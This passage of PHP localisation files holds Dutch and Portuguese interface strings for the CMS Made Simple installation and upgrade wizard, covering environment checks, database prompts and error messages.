$lang['memory_limit'] = 'Controleren of de ingestelde PHP memory limit voldoende is';
$lang['msg_clearedcache'] = 'Server buffer geleegd';
$lang['msg_configsaved'] = 'Bestaand config bestand opgeslagen al %s';
$lang['msg_upgrade_module'] = 'Module %s bijwerken';
$lang['msg_upgrademodules'] = 'Modules bijwerken';
$lang['msg_yourvalue'] = 'U heeft: %s';
$lang['multibyte_support'] = 'Controleer multibyte support';
$lang['next'] = 'Volgende';
$lang['no'] = 'Nee';
$lang['none'] = 'Geen';
$lang['open_basedir'] = 'open_basedir beperkingen';
$lang['open_basedir_session_save_path'] = 'open_basedir is ingeschakeld.  Kan session save path niet testen.';
$lang['output_buffering'] = 'Testen of output buffering is ingeschakeld';
$lang['pass_config_writable'] = 'Het HTTP proces heeft schrijfrechten om het config.php bestand aan te passen';
$lang['pass_database_support'] = 'Er is in ieder geval één bruikbare database driver gevonden';
$lang['pass_func_json'] = 'json functionaliteit gevonden';
$lang['pass_func_md5'] = 'md5 functionaliteit gevonden';
$lang['pass_func_tempnam'] = 'tempnam functionaliteit gevonden';
$lang['pass_multibyte_support'] = 'Het lijkt er op dat Multibyte ondersteund wordt';
$lang['pass_php_version'] = 'De PHP versie van de webserver voldoet niet aan de gestelde eisen. Verplicht is minimaal PHP %s, maar aan te bevelen is PHP %s of hoger';
$lang['password'] = 'Wachtwoord';
$lang['ph_sitename'] = 'Voer een website naam in';
$lang['php_version'] = 'PHP Versie';
$lang['post_max_size'] = 'Controleren van de maximale hoeveelheid data dat in een verzoek kan worden gepost';
$lang['prompt_addlanguages'] = 'Extra Taalpakketten';
$lang['prompt_createtables'] = 'Database tabellen maken';
$lang['prompt_dbhost'] = 'Database Hostnaam';
$lang['prompt_dbinfo'] = 'Database Informatie';
$lang['prompt_dbname'] = 'Database Naam';
$lang['prompt_dbpass'] = 'Wachtwoord';
$lang['prompt_dbport'] = 'Database Poortnummer';
$lang['prompt_dbprefix'] = 'Database Tabelnaam Prefix';
$lang['prompt_dbtype'] = 'Database type';
$lang['prompt_dbuser'] = 'Gebruikersnaam';
$lang['prompt_dir'] = 'Installatie Directory';
$lang['prompt_installcontent'] = 'Voorbeeld Inhoud Installeren';
$lang['prompt_queryvar'] = 'Query Variabele';
$lang['prompt_sitename'] = 'Website naam';
$lang['prompt_timezone'] = 'Server Tijdzone';
$lang['pwd_writable'] = 'Directory schrijfbaar';
$lang['queue_for_upgrade'] = 'Module %s staat in de wachtrij om in de volgende stap te worden bijgewerkt.';
$lang['readme_uc'] = 'LEES MIJ';
$lang['register_globals'] = 'Controleren of "register globals" uitgeschakeld is';
$lang['remote_url'] = 'Uitgaande HTTP verbindingen';
$lang['repeatpw'] = 'Herhaal';
$lang['reset_site_preferences'] = 'Reset bepaalde website instellingen';
$lang['reset_user_settings'] = 'Reset Gebruikersinstellingen';
$lang['retry'] = 'Probeer opnieuw';
$lang['safe_mode'] = 'Testen of "safe mode" is uitgeschakeld';
$lang['saltpasswords'] = 'Salt Wachtwoorden';
$lang['select_language'] = 'Het eerste wat we u vragen te doen is om de gewenste taal uit de onderstaande lijst selecteren. Deze zal worden gebruikt om tijdens deze installatie, maar zal geen invloed hebben op uw CMSMS website.';
$lang['send_admin_email'] = 'Stuur een email met de Admin login gegevens';
$lang['session_capabilities'] = 'Testen voor de juiste sessiemogelijkheden (sessies maken gebruik van cookies en de locatie voor de cookie is schrijfbaar enz.)';
$lang['session_save_path_exists'] = 'Session_save_path bestaat';
$lang['session_save_path_writable'] = 'Session_save_path is beschrijfbaar';
$lang['session_use_cookies'] = 'Controleren of PHP sessions cookies gebruikt';
$lang['sometests_failed'] = 'Op de huidige web-omgeving zijn verschillende tests uitgevoerd. Ondanks dat er geen kritieke zaken zijn gevonden wordt aangeraden om de volgende onderdelen aan te passen voordat verder wordt gegaan.';
$lang['step1_advanced'] = 'Uitgebreide modus';
$lang['step1_destdir'] = 'Selecteer server directory';
$lang['step1_info_destdir'] = '<strong>Warning:</strong> Dit programma kan meerdere installaties van CMSMS bijwerken/upgraden of installeren. Het is daarom van belang dat de juiste folder voor de installatie of de upgrade wordt geselecteerd.';
$lang['step1_language'] = 'Selecteer Taal';
$lang['step1_title'] = 'Selecteer Taal';
$lang['step2_cmsmsfound'] = 'Er is een CMS Made Simple website gevonden en het is mogelijk deze installatie te upgraden. Echter, voordat u verder gaat zorg er voor dat u een actuele GECONTROLEERDE back-up van alle bestanden en van de database heeft!';
$lang['step2_cmsmsfoundnoupgrade'] = 'Hoewel er CMS Made Simple website is gevonden, is het niet mogelijk om deze versie te upgraden door middel van deze Installatie Assistent. Waarschijnlijk is de aanwezige versie te oud.';
$lang['step2_confirminstall'] = 'Weet u zeker dat u CMS Made Simple wilt installeren';
$lang['step2_confirmupgrade'] = 'Weet u zeker dat u CMS Made Simple wilt upgraden';
$lang['step2_installdate'] = 'Globale installatie datum';
$lang['step2_hdr_upgradeinfo'] = 'Versie-informatie';
$lang['step2_nocmsms'] = 'We vinden geen bestaande CMS Made Simple website in deze directory. Het lijkt er op dat u een nieuwe installatie wil doen';
$lang['step2_passed'] = 'Geslaagd';
$lang['step2_pwd'] = 'Uw huidige werkmap is';
$lang['step2_schemaver'] = 'Database Schema Versie';
$lang['step2_version'] = 'Uw versie';
$lang['symbol'] = 'Symbool';
$lang['social_message'] = 'Ik heb met succes CMS Made Simple geïnstalleerd!';
$lang['test_failed'] = 'Een noodzakelijke test is mislukt';
$lang['th_testname'] = 'Controle';
$lang['th_value'] = 'Waarde';
$lang['title_error'] = 'Er is een fout opgetreden!';
$lang['title_step2'] = 'Stap 2 - Aanwezigheid software controleren';
$lang['title_step3'] = 'Stap 3 - Compatibiliteit Controle';
$lang['title_step4'] = 'Stap 4 - Basis Configuratie';
$lang['title_step5'] = 'Stap 5 - Admin Account Configuratie';
$lang['title_step6'] = 'Stap 6 - Website Instellingen';
$lang['title_step7'] = 'Stap 7 - Installatie bestanden';
$lang['title_step8'] = 'Stap 8 - Database vullen';
$lang['title_step9'] = 'Stap 9 - Gereed';
$lang['title_welcome'] = 'Welkom';
$lang['title_docs'] = 'Officiële Documentatie';
$lang['title_api_docs'] = 'Officiële API Documentatie';
$lang['to'] = 'bij';
$lang['title_share'] = 'Deel uw ervaringen met uw vrienden';
$lang['tmpfile'] = 'Controleren naar een werkende tmpfile()';
$lang['tmp_dirs_empty'] = 'Zorg ervoor dat de tijdelijke folders leeg zijn of nog niet zijn aangemaakt';
$lang['upgrade'] = 'Bijwerken';
$lang['upgrade_deleteoldevents'] = 'Oude "gebeurtenissen" verwijderen';
$lang['upgrading_schema'] = 'Database schema bijwerken';
$lang['upload_max_filesize'] = 'Controleren van de maximale omvang van de toegevoegde bestanden';
$lang['username'] = 'Gebruikersnaam';
$lang['warn_memory_limit'] = 'De geheugenlimietwaarde is %s, wat hoger is dan het minimum van %s. %s wordt echter aanbevolen';
$lang['warn_open_basedir'] = 'open_basedir is ingeschakeld in de php-configuratie. Hoewel u kunt doorgaan, ondersteunt CMSMS geen installaties met open_basedir-beperkingen.';
$lang['warn_upload_max_filesize'] = 'Hoewel de instelling van %s voldoende is, wordt aangeraden de instelling upload_max_filesize in PHP te verhogen tot ten minste %s';
$lang['wizard_step1'] = 'Welkom';
$lang['wizard_step2'] = 'Controleren op bestaande software';
$lang['wizard_step3'] = 'Compatibiliteit Controle';
$lang['wizard_step4'] = 'Configuratie Informatie';
$lang['wizard_step5'] = 'Beheer Account Informatie';
$lang['wizard_step6'] = 'Website Instellingen';
$lang['wizard_step7'] = 'Installatie Bestanden';
$lang['wizard_step8'] = 'Database bewerkingen';
$lang['wizard_step9'] = 'Gereed';
$lang['xml_functions'] = 'Controleer XML functionaliteit';
$lang['yes'] = 'Ja';
?><?php
$lang['action_freshen'] = 'A refrescar / reparar uma instalação CMSMS %s';
$lang['action_install'] = 'A criar um site CMSMS %s';
$lang['action_upgrade'] = 'A actualizar um site CMSMS para a versão %s';
$lang['advanced_mode'] = 'Habilitar o modo avançado';
$lang['apptitle'] = 'Assistente de instalação e actualização';
$lang['available_languages'] = 'Linguagens disponíveis';
$lang['build_date'] = 'Data de Build';
$lang['changelog_uc'] = 'REGISTO CHANGELOG';
$lang['cleaning_files'] = 'A apagar os ficheiros que já não se aplicam a esta versão';
$lang['config_writable'] = 'A verificar se existe um ficheiro config escrevível';
$lang['confirm_freshen'] = 'Tem a certeza de que quer refrescar (reparar) a instalação existente do CMSMS? Use extrema precaução!';
$lang['confirm_upgrade'] = 'Tem a certeza de que quer iniciar o processo de actualização?';
$lang['curl_extension'] = 'A verificar a extensão CURL';
$lang['database_support'] = 'A verificar drivers de base de dados compatíveis';
$lang['desc_wizard_step1'] = 'Iniciar o processo de instalação ou actualização';
$lang['desc_wizard_step2'] = 'Analizar o directório de destino à procura de software existente';
$lang['desc_wizard_step3'] = 'A verificar se está tudo OK para prosseguir com a instalação do núcleo do CMSMS';
$lang['desc_wizard_step4'] = 'Para novas instalações, e operação de refrescar, digite os dados de configuração básica';
$lang['desc_wizard_step5'] = 'Para novas instalações, digite os dados da conta Administração';
$lang['desc_wizard_step6'] = 'Para novas instalações digite alguns detalhes básicos do site';
$lang['desc_wizard_step7'] = 'Extrair ficheiros';
$lang['desc_wizard_step8'] = 'Criar ou actualizar o schema da base de dados, configurar eventos iniciais, permissões, contas de utilizador, escantilhões (templates), folhas de estilo (stylesheets) e conteúdo';
$lang['desc_wizard_step9'] = 'Instalar e/ou actualizar módulos conforme necessário, criar ficheiro config, e remover o lixo.';
$lang['destination_directory'] = 'Directório de Destino';
$lang['dest_writable'] = 'Permissões de escrita no directório de destino';
$lang['disable_functions'] = 'Funções desabilitadas';
$lang['done'] = 'Concluído';
$lang['email_accountinfo_message'] = 'A sua instalação do CMS Made Simple está completa.

Este email contém dados sensíveis, e deve ser guardado de forma segura.

Estes são os detalhes da sua instalação:
Nome de Utilizador: %s
Senha: %s
Directório de Instalação: %s
URL da Root: %s';
$lang['email_accountinfo_message_exp'] = 'A sua instalação do CMS Made Simple está completa.

Este email contém dados sensíveis, e deve ser guardado de forma segura.

Estes são os detalhes da sua instalação:
Nome de Utilizador: %s
Senha: %s
Directório de Instalação: %s';
$lang['email_accountinfo_subject'] = 'CMS Made Simple foi Instalado com Sucesso';
$lang['emailaccountinfo'] = 'Enviar os dados da conta por email';
$lang['emailaddr'] = 'Endereço de Email';
$lang['error_adminacct_emailaddr'] = 'O endereço de email especificado não é válido';
$lang['error_adminacct_emailaddrrequired'] = 'Foi seleccionada a opção de enviar os dados da conta por email, mas não foi especificado um endereço de email válido';
$lang['error_adminacct_password'] = 'A senha especificada não é válida (no mínimo deverá ter seis charateres)';
$lang['error_adminacct_repeatpw'] = 'As senhas digitadas não são iguais.';
$lang['error_adminacct_username'] = 'O nome de utilizador especificado não é válido. Por favor tente de novo';
$lang['error_admindirrenamed'] = 'Aparentemente terá mudado o nome do directório de Admin do CMSMS por razões de segurança. Reverta para o nome original para prosseguir';
$lang['error_backupconfig'] = 'Não foi possível fazer um backup apropriado do ficheiro de config';
$lang['error_checksum'] = 'O checksum do ficheiro extraído não confere com o original';
$lang['error_cmstablesexist'] = 'Aparentemente já existe uma instalação de CMSMS nesta base de dados. Por favor, especifique dados diferentes para esta instalação. Se desejar usar um prefixo de tabelas diferentes, poderá ter de reiniciar o processo de instalação e habilitar o Modo Avançado.';
$lang['error_createtable'] = 'Problema ao criar tabela na base de dados... provavelmente uma questão de permissões';
$lang['error_dbconnect'] = 'Não foi possível estabelecer ligação com a base de dados. Por favor verifique cuidadosamente as credenciais fornecidas';
$lang['error_dirnotvalid'] = 'O directório %s não existe (ou não permite escrita)';
$lang['error_droptable'] = 'Foi detectado um problema ao apagar a tabela da base de dados... possivelmente uma questão de permissões';
$lang['error_filenotwritable'] = 'Não foi possível re-escrever o ficheiro %s (problema de permissões)';
$lang['error_internal'] = 'Lamentamos, alguma coisa correu mal... (erro interno) (%s)';
$lang['error_invalid_directory'] = 'Aparentemente o directório que foi escolhido para a instalação é o directório de trabalho do próprio instalador';
$lang['error_invalidconfig'] = 'Erro no ficheiro config, ou ficheiro de config inexistente';
$lang['error_invaliddbpassword'] = 'A senha da base de dados contem caracteres inválidos os quais não poderão ser correctamente guardados.';
$lang['error_invalidkey'] = 'Chave ou variável inválida %s na classe %s';
$lang['error_invalidparam'] = 'Parâmetro ou valor do parâmetro inválido: %s';
$lang['error_missingconfigvar'] = 'A chave "%s" do ficheiro config.ini ou não existe ou não é válida';
$lang['error_noarchive'] = 'Problema na procura do ficheiro de archivo... por favor reinicie';
$lang['error_nlsnotfound'] = 'Problema na procura de ficheiros NLS no ficheiro de archivo';
$lang['error_nodatabases'] = 'Não foram encontrados extensões compatíveis de base de dados';
$lang['error_nodbhost'] = 'Por favor digite um nome de host (ou um endereço de IP) válido para a ligação à base de dados';
$lang['error_nodbname'] = 'Por favor digite o nome de uma base de dados válida no host especificado anteriormente';
$lang['error_nodbpass'] = 'Por favor digite uma senha válida para autenticar a ligação à base de dados';
$lang['error_nodbprefix'] = 'Por favor digite um prefixo válido para as tabelas da base de dados';
$lang['error_nodbtype'] = 'Por favor seleccione um tipo de base de dados';
$lang['error_nodbuser'] = 'Por favor digite';
$lang['error_nodestdir'] = 'O directório de destino não foi definido';
$lang['error_nositename'] = 'O nome do site é um parâmetro requerido. Por favor digite um nome adequado para o seu website';
$lang['error_notimezone'] = 'Por favor digite um fuso horário válido para este servidor';
$lang['error_sendingmail'] = 'Erro ao enviar email';
$lang['error_tzlist'] = 'Ocorreu um problema ao obter a lista de identificadores de fuso horário';
$lang['errorlevel_estrict'] = 'Verificação de E_STRICT';
$lang['errorlevel_edeprecated'] = 'Verificação de E_DEPRECATED';
$lang['edeprecated_enabled'] = 'A directiva E_DEPRECATED está activa na configuração de PHP error_reporting. Não é impedimento para a operação do CMSMS mas poderá resultar no aparecimento de avisos PHP nas páginas, em particular como resultado do uso de módulos de terceiros mais antigos.';
$lang['estrict_enabled'] = 'A directiva E_STRICT está activa na configuração de PHP error_reporting. Não é impedimento para a operação do CMSMS mas poderá resultar no aparecimento de avisos PHP nas páginas, em particular como resultado do uso de módulos de terceiros mais antigos.';
$lang['fail_config_writable'] = 'O processo HTTP não consegue escrever no ficheiro config.php. Por favor tente mudar as permissões deste ficheiro para 777 até ao final do processo de actualização';
$lang['fail_curl_extension'] = 'A extensão curl não foi encontrada. Não sendo um problema crítico poderá causar dificuldades a alguns módulos de terceiros';
$lang['fail_database_support'] = 'Não foram encontrados drivers de base de dados compatíveis';
$lang['fail_file_get_contents'] = 'A função file_get_contents não existe, ou encontra-se desabilitada. CMSMS não pode continuar (inclusivamente o própio instalador poderá falhar)';
$lang['fail_file_uploads'] = 'A capacidade de carregar ficheiros para o servidor estão desactivadas neste ambiente. Diversas funções do CMSMS não irão funcionar neste ambiente';
$lang['fail_func_json'] = 'funcionalidade json não detectada';
$lang['fail_func_gzopen'] = 'funcionalidade gzopen não detectada';
$lang['fail_func_md5'] = 'funcionalidade md5 não detectada';
$lang['fail_func_tempnam'] = 'A função tmpnam não existe. É uma função requerida para o funcionamento do CMSMS';
$lang['fail_func_ziparchive'] = 'funcionalidade ZipArchive não detectada, o que poderá causar algumas limitações';
$lang['fail_ini_set'] = 'Aparentemente não é possível alterar as configurações ini. Poderá causar problemas a módulos de terceiros (ou ao habilitar o modo de depuração)';
$lang['fail_magic_quotes_runtime'] = 'Aparentemente a directiva magic quotes está habilitada nesta configuração. Por favor desabilite-a e tente de novo';
$lang['fail_max_execution_time'] = 'O tempo máximo de execução corrente de %s não chega ao valor mínimo de %s. Recomenda-se que aumente esse valor para %s ou superior';
$lang['fail_memory_limit'] = 'O seu valor de limite de memoria é demasiado baixo. Foi detectado %s, no entanto é requerido um mínimo de %s, e recomendado %s';
$lang['fail_multibyte_support'] = 'O suporte a multibyte não de encontra habilitado nesta configuração';
$lang['fail_output_buffering'] = 'O output buffering não de encontra habilitado';
$lang['fail_open_basedir'] = 'Estão em efeito restrições de open basedir. O CMSMS requer que estas restrições se encontrem desabilitadas';
$lang['fail_php_version'] = 'A versão de PHP disponível é extremamente importante para o funcionamento do CMSMS. A versão mínima aceitável é %s, no entanto recomendamos %s ou maior. Foi detectada %s';
$lang['fail_post_max_size'] = 'O tamanho máximo de post encontrado, %s, não chega ao valor mínimo de %s. Deverá ser aumentado para %s. Assegure-se de que este valor seja superior ao upload_max_filesize';
$lang['fail_pwd_writable2'] = 'O processo HTTP necessita de conseguir escrever no directório de destino (e em todos os directórios e ficheiros que lhe são interiores) para poder instalar ficheiros. O instalador não tem permissão de escrita de (pelo menos) %s';
$lang['fail_register_globals'] = 'Por favor desabilite o register globals na sua configuração de PHP';
$lang['fail_remote_url'] = 'Foram encontrados problemas na ligação a um URL remoto. Estes irão limitar alguma da funcionalidade do CMS Made Simple';
$lang['fail_safe_mode'] = 'O CMSMS não irá operar adequadamente num ambiente aonde o safe mode esteja habilitado. Note que o safe mode foi marcado como obsoleto ao ser considerado um mecanismo falhado, e será removido em versões futuras do PHP';
$lang['fail_session_save_path_exists'] = 'O valor da variável session save path não é válido ou o directório não existe';
$lang['fail_session_save_path_writable'] = 'O directório session save path não é escrevível';
$lang['fail_session_use_cookies'] = 'As sessões NÃO estão configuradas para o uso de cookies';
$lang['fail_tmpfile'] = 'A função de sistema tmpfile() não está a funcionar. Esta função é necessária para permitir a extracção de ficheiros dos arquivos. O argumento de URL opcional TMPDIR pode ser usado para especificar um directório com permissões de escrita. Consulte o ficheiro README que deverá estar incluído neste directório.';
$lang['fail_xml_functions'] = 'A extensão XML não foi encontrada. Por favor habilite-a no seu ambiente PHP';
$lang['failed'] = 'falhou';
$lang['file_get_contents'] = 'A testar a função file_get_contents';
$lang['file_installed'] = '%s Instalado';
$lang['file_uploads'] = 'Verificação de suporte de upload de ficheiros';
$lang['finished_custom_freshen_msg'] = 'A instalação corrente foi refrescada! Os ficheiros do núcleo foram actualizados e foi criado um novo ficheiro config. Por favor visite o seu website para se certificar de que tudo está a funcionar correctamente.';
$lang['finished_custom_install_msg'] = 'Woot! Acabámos. Por favor visite o seu website e dê entrada no painel Admin';
$lang['finished_custom_upgrade_msg'] = 'Woot! Está tudo finalizado. Por favor viste o Painel Admin, e o lado público do seu site para certificar-se de que está tudo a funcionar adequadamente. <br/><strong>Sugestão:</strong> esta é uma boa altura para fazer outra cópia de segurança.';
$lang['finished_freshen_msg'] = 'A instalação corrente foi refrescada! Os ficheiros do núcleo foram actualizados e foi criado um novo ficheiro config.  Já pode <a href="%s">visitar o seu website</a> ou <a href="%s">dar entrada no painel admin do CMSMS</a>.';
$lang['finished_install_msg'] = 'Woot! Acabámos. Já pode <a href="%s">visitar o seu website</a> ou <a href="%s">dar entrada no painel admin do CMSMS</a>.';
$lang['finished_upgrade_msg'] = 'Woot! Está tudo finalizado. Por favor  <a href="%s">visite o seu site</a>, e o <a href="%s">Painel Admin</a> para certificar-se de que está tudo a funcionar adequadamente. Poderá ainda ser necessária a actualização de alguns módulos de terceiros. <br/><strong>Pista:</strong> esta é uma boa altura para fazer outra cópia de segurança.';
$lang['freshen'] = 'Refrescar (reparar)';
$lang['func_json'] = 'Verificação de funcionalidade de codificação e descodificação json';
$lang['func_md5'] = 'Verificação de funcionalidade md5';
$lang['func_tempnam'] = 'Verificação de função tempnam';
$lang['func_gzopen'] = 'Verificação de função gzopen';
$lang['func_ziparchive'] = 'Verificação de função  ZipArchive';
$lang['gd_version'] = 'Versão GD';
$lang['goback'] = 'Voltar';
$lang['info_addlanguages'] = 'Seleccionar linguagens (para além do Inglês) a instalar. Nota: nem todas as traduções estão completas.';
$lang['info_adminaccount'] = 'Por favor especifique as credenciais para a conta inicial de administrador. Esta conta terá acesso a toda a funcionalidade da consola de admin do CMSMS.';
$lang['info_advanced'] = 'O modo avançado habilita mais opções no processo de instalação.';
$lang['info_dbinfo'] = 'O CMS Made Simple guarda uma quantidade considerável de dados na base de dados. Uma ligação a uma base de dados é mandatória. Adicionalmente, as credenciais que fornecer deverão ter TODOS OS PRIVILÉGIOS para a base de dados especificada de forma a ser possível criar, apagar e modificar tabelas, indexes e views.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED é uma flag da directiva de PHP error reporting que indica que devem ser emitidos avisos (mensagens Warning) quando o código de programação usa técnicas obsoletas. Apesar do núcleo do CMSMS tentar assegurar tanto quanto possível que estas técnicas não são usadas, alguns módulos poderão não cumprir este standard. É recomendado que se desabilite esta configuração PHP';
$lang['info_errorlevel_estrict'] = 'E_STRICT é uma flag da directiva de PHP error reporting que indica quando os standards estritos de programação devem ser respeitados. Apesar do núcleo do CMSMS estar em conformidade com os standards E_STRICT tanto quanto possível, alguns módulos poderão não cumprir este standard. É recomendado que se desabilite esta configuração PHP';
$lang['info_installcontent'] = 'Por defeito este instalador irá criar uma série de páginas de exemplo, folhas de estilo e templates nesta instalação do CMSMS. Este conteúdo de exemplo providencia informação extensiva bem como pistas para ajudar à construção de sites com o CMSMS e é de leitura recomendada e útil. No entanto se já estiver familiarizado com o CMS Made Simple, ao desabilitar esta opção estará a criar apenas um conjunto mínimo de templates, folhas de estilo, e páginas de conteúdo.';
$lang['info_open_basedir_session_save_path'] = 'A directiva open_basedir está habilitada na sua configuração de PHP. Não nos foi possível testar as capacidades de sessão de forma apropriada. Contudo, ter chegado a este ponto da instalação indica que, com toda a probabilidade, as sessões estarão a funcionar correctamente.';
$lang['info_pwd_writable'] = 'Esta aplicação necessita de permissão de escrita no directório de trabalho corrente';
$lang['info_queryvar'] = 'A variável de query é usada internamente pelo CMSMS para indentificar a página requerida. Na maioria das circunstâncias não deverá ser necessário ajustar esta entrada.';
$lang['info_sitename'] = 'O nome do website é usado nos templates pré-configurados com parte do título. Por favor dê ao site um nome que seja inteligível';
$lang['info_timezone'] = 'A informação de fuso horário é necessária aos cálculos e usos de data/hora no site. Por favor seleccione o fuso horário do servidor.';
$lang['ini_set'] = 'A testar se é possível modificar configurações INI';
$lang['install'] = 'Instalar';
$lang['install_attachstylesheets'] = 'Anexar folhas de estilo a temas';
$lang['install_backupconfig'] = 'A fazer cópia de segurança do ficheiro config';
$lang['install_created_index'] = 'Criados índices %s ... %s';
$lang['install_create_tables'] = 'Criar tabelas de base de dados';
$lang['install_createconfig'] = 'Criar novo ficheiro config';
$lang['install_createcontentpages'] = 'Criar páginas de conteúdo pré-definidas';
$lang['install_created_table'] = 'Foi criada a tabela  %s: .... %s';
$lang['install_createtablesindexes'] = 'A criar tabelas e indexes';
$lang['install_createtmpdirs'] = 'A criar directórios temporários';
$lang['install_creating_index'] = 'Criado índice %s';
$lang['install_default_collections'] = 'Instalar colecções pré-definidas';
$lang['install_defaultcontent'] = 'Instalar conteúdo pré-definido';
$lang['install_detectlanguages'] = 'Detectar idiomas instalados';
$lang['install_dropping_tables'] = 'A apagar tabelas';
$lang['install_dummyindexhtml'] = 'Criar ficheiros index.html fictícios';
$lang['install_extractfiles'] = 'Extrair ficheiros do arquivo';
$lang['install_initevents'] = 'Criar eventos';
$lang['install_initsitegroups'] = 'Criar grupos iniciais';
$lang['install_initsiteperms'] = 'Definir permissões iniciais';
$lang['install_initsiteprefs'] = 'Definir preferências de site iniciais';
$lang['install_initsiteusers'] = 'criar conta inicial de utilizador';
$lang['install_initsiteusertags'] = 'UDT\'s (user defined tags) iniciais';
$lang['install_module'] = 'Instalar o módulo %s';
$lang['install_modules'] = 'Instalar módulos disponíveis';
$lang['install_passwordsalt'] = 'Definir sal de senhas';
$lang['install_requireddata'] = 'Definir os dados iniciais requeridos';
$lang['install_schema'] = 'Criar schema da base de dados';
$lang['install_setschemaver'] = 'Definir versão do schema';
$lang['install_setsequence'] = 'Reiniciar sequências das tabelas';
$lang['install_setsitename'] = 'Definir o nome do site';
$lang['install_stylesheets'] = 'Criar folhas de estilo pré-definidas';
$lang['install_templates'] = 'Criar templates pré-definidos';
$lang['install_templatetypes'] = 'Criar tipos standard de templates';
$lang['install_update_sequences'] = 'Actualizar as tabelas de sequências';
$lang['install_updatehierarchy'] = 'Actualizar posições hierárquicas de conteúdo';
$lang['install_updateseq'] = 'Actualizar a sequência de %s';
$lang['installer_ver'] = 'Versão do instalador';
$lang['legend'] = 'Legenda';
$lang['magic_quotes_runtime'] = 'Assegurar que as magic quotes estão desabilitadas';
$lang['max_execution_time'] = 'Verificação de tempo máximo de execução de um script PHP';
$lang['meaning'] = 'Significado';
$lang['memory_limit'] = 'Verificação de limite de memória PHP suficiente';
$lang['msg_clearedcache'] = 'A cache do servidor foi limpa';
$lang['msg_configsaved'] = 'O ficheiro config existente foi guardado em %s';
$lang['msg_upgrade_module'] = 'A actualizar o módulo %s';
$lang['msg_upgrademodules'] = 'Actualização de módulos';
$lang['msg_yourvalue'] = 'Detectou-se: %s';
$lang['multibyte_support'] = 'Verificação de suporte multibyte';
$lang['next'] = 'Seguinte';
$lang['no'] = 'Não';
$lang['none'] = 'Nenhum';
$lang['open_basedir'] = 'Restrições open_basedir';
$lang['open_basedir_session_save_path'] = 'A directiva open_basedir está habilitada. Não é possível testar o directório de sessão (session save path)';
$lang['output_buffering'] = 'Assegurar que o output buffering está abilitado';
$lang['pass_config_writable'] = 'O processo HTTP tem permissões de escrita no ficheiro config.php';
$lang['pass_database_support'] = 'Foi encontrado pelo menos um driver de base de dados';
$lang['pass_func_json'] = 'funcionalidade json detectada';
$lang['pass_func_md5'] = 'funcionalidade json detectada';
$lang['pass_func_tempnam'] = 'A função tempnam existe';
$lang['pass_multibyte_support'] = 'Suporte multibite parece estar habilitado';
$lang['pass_php_version'] = 'A versão de PHP configurada neste momento não está de acordo com os requerimentos mínimos. No mínimo a versão PHP %s é requerida, embora seja recomendada %s ou superior';
$lang['pass_pwd_writable'] = 'O processo HTTP não consegue escrever no directório de destino. Necessário à extracção dos ficheiros';
$lang['password'] = 'Senha';
$lang['ph_sitename'] = 'Digite um nome para o site';
$lang['php_version'] = 'Versão de PHP';
$lang['post_max_size'] = 'Verificação do valor máximo de dados que é possível usar num request';
$lang['prompt_addlanguages'] = 'Linguagens adicionais';
$lang['prompt_createtables'] = 'Criar Tabelas da Base de Dados';
$lang['prompt_dbhost'] = 'Nome do Host da Base de Dados';
$lang['prompt_dbinfo'] = 'Informação da Base de Dados';
$lang['prompt_dbname'] = 'Nome da Base de Dados';
$lang['prompt_dbpass'] = 'Senha';
$lang['prompt_dbport'] = 'Número do Port da Base de Dados';
$lang['prompt_dbprefix'] = 'Prefixo dos Nomes das Tabelas da Base de Dados';
$lang['prompt_dbtype'] = 'Tipo da Base de Dados';
$lang['prompt_dbuser'] = 'Nome de Utilizador';
$lang['prompt_dir'] = 'Directório de Instalação';
$lang['prompt_installcontent'] = 'Instalar Conteúdo de Demonstração';
$lang['prompt_queryvar'] = 'Variável de Query';
$lang['prompt_sitename'] = 'Nome do Web Site';
$lang['prompt_timezone'] = 'Fuso Horário do Servidor';
$lang['pwd_writable'] = 'Directório Escrevível';
$lang['queue_for_upgrade'] = 'Próximo modulo não pertencente ao core em fila para actualização no passo seguinte: %s.';
$lang['readme_uc'] = 'LEIA-ME';
$lang['register_globals'] = 'Assegurar que o \'register globals\' está desabilitado';
$lang['remote_url'] = 'Conexões HTTP de saída';
$lang['repeatpw'] = 'Repita a senha';
$lang['reset_site_preferences'] = 'Repor algumas preferências globais';
$lang['reset_user_settings'] = 'Repor algumas preferências de utilizador';
$lang['retry'] = 'Tentar de Novo';
$lang['safe_mode'] = 'Teste para assegurar que o  \'safe mode\' está desabilitado';
$lang['saltpasswords'] = 'Salgar Senhas';
$lang['select_language'] = 'A primeira coisa que lhe vamos pedir é para seleccionar a sua preferência de idioma da lista seguinte. Esta opção será usada para melhorar a sua experiência durante esta sequência de instalação, mas não terá qualquer efeito na instalação final do CMSMS.';
$lang['send_admin_email'] = 'Enviar email com as credenciais de acesso à secção admin';
$lang['session_capabilities'] = 'Teste a existência de recursos adequados de sessão (o uso de cookies pela sessão, o directório de sessão permitir escrita, etc)';
$lang['session_save_path_exists'] = 'Session_save_path existe';
$lang['session_save_path_writable'] = 'Session_save_path tem propriedades de escrita';
$lang['session_use_cookies'] = 'Assegurar que as sessões PHP usam cookies';
$lang['sometests_failed'] = 'Foram executados uma série de testes no ambiente web corrente. Embora não tenham sido encontrados nenhuns problemas críticos, recomenda-se que os itens seguintes sejam corrigidos antes de prosseguir.';
$lang['step1_advanced'] = 'Modo Avançado';
$lang['step1_destdir'] = 'Seleccionar Directório';
$lang['step1_info_destdir'] = 'Aviso: este programa pode instalar ou actualizar mais do que uma instalação do CMS Made Simple. É importante seleccionar o directório correcto para a sua instalação ou actualização.';
$lang['step1_language'] = 'Seleccionar Linguagem';
$lang['step1_title'] = 'Seleccionar Linguagem';
$lang['step2_cmsmsfound'] = 'Foi encontrada uma instalação do CMS Made Simple. É possível actualizar esta instalação. No entanto, antes de prosseguir, assegure-se de que tem uma cópia de segurança VERIFICADA, de todos os ficheiros bem como da base de dados';
$lang['step2_cmsmsfoundnoupgrade'] = 'Embora tenha sido encontrada uma instalação do CMS Made Simple, não é possível usar esta aplicação para actualizá-la. Possivelmente é uma versão muito antiga.';
$lang['step2_confirminstall'] = 'Tem a certeza de que quer instalar o CMS Made Simple';
$lang['step2_confirmupgrade'] = 'Tem a certeza de que quer actualizar o CMS Made Simple';
$lang['step2_errorsamever'] = 'O directório seleccionado aparenta ter uma instalação do CMSMS com a mesma versão que vem incluída neste script. Continuar com este processo irá refrescar esta instalação.';
$lang['step2_errortoonew'] = 'O directório seleccionado aparenta ter uma instalação do CMSMS mais recente do que a  incluída neste script. Não é possível prosseguir.';
